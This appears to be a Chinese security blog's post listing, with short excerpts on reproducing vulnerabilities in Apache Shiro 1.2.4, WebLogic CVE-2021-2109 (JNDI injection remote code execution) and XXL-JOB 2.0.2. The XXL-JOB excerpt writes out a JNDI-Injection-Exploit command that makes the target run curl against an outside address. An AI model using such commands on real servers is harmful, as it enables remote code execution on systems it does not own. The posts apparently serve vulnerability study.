摘要: 环境 jdk:1.8 shiro:1.2.4 Shiro简介 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,您可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。 漏洞原理 Apache 阅读全文
posted @ 2021-03-09 18:25 liangzai6 阅读(4531) 评论(0) 推荐(1) 编辑
摘要: 2021年1月20日,Oracle官方发布了漏洞补丁,修了包括 CVE-2021-2109 Weblogic Server远程代码执行漏洞在内的多个高危严重漏洞。CVE-2021-2109 中,攻击者可构造恶意请求,造成JNDI注入,执行任意代码,从而控制服务器。 影响版本: WebLogic 10 阅读全文
posted @ 2021-01-23 00:19 liangzai6 阅读(608) 评论(1) 推荐(0) 编辑
摘要: 环境: XXL-JOB 2.0.2 1.开启RMI服务 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "curl [Address]:5555" 使用最后一个。 2.生成Payload java -cp mar 阅读全文
posted @ 2020-12-06 17:30 liangzai6 阅读(1554) 评论(1) 推荐(0) 编辑